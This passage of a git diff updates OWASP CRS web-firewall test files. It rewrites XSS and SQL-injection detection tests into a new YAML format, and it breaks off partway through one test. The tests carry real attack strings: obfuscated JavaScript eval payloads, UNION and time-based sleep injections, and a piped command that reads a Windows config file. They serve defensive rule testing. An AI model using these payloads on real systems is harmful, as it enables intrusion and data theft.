"/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=%5B%201234%20%5D.%20map%20.%20call%60%24%7Beval%7D%2F%2A%20asd%20%2A%2F%5C%5Cu%7B61%7Dlert%5Cx281337%5Cx29%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 6 desc: "JavaScript function without parentheses" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" - version: HTTP/1.1 - output: - log_contains: id "941400" - - test_title: 941400-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?xss=Reflect.apply.call%60%24%7Bnavigation.navigate%7D%24%7Bnavigation%7D%24%7B%5Bname%5D%7D%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] + - test_id: 7 desc: "Status Page Test - JavaScript minimal test with Reflect.sort.call``" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?test=Reflect.sort.call%60%60" - version: HTTP/1.1 - output: - log_contains: id "941400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?test=Reflect.sort.call%60%60" + version: HTTP/1.1 + output: + log: + expect_ids: [941400] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml index 69fb901..e7c6163 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml @@ -2,244 +2,243 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942100.yaml +rule_id: 942100 tests: - - test_title: 942100-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1234 OR 1=1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1234 OR 1=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839' or '1'='1" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839' or '1'='1" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-1839\" or \"1\"=\"2" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-1839\" or \"1\"=\"2" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 4 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 5 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=EmptyValue' and 526=527" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=EmptyValue' and 526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 6 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 7 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 8 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 9 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/unitests.txt') UNION ALL select NULL --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 10 desc: "Advanced SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "1'||(select extractvalue(xmltype('%toyop;" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log: + expect_ids: [942100] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a..5af7502 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml @@ -2,182 +2,181 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 6 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942101] + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942101] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008e..39094ed 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml @@ -1,674 +1,671 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942120.yaml +rule_id: 942120 tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: 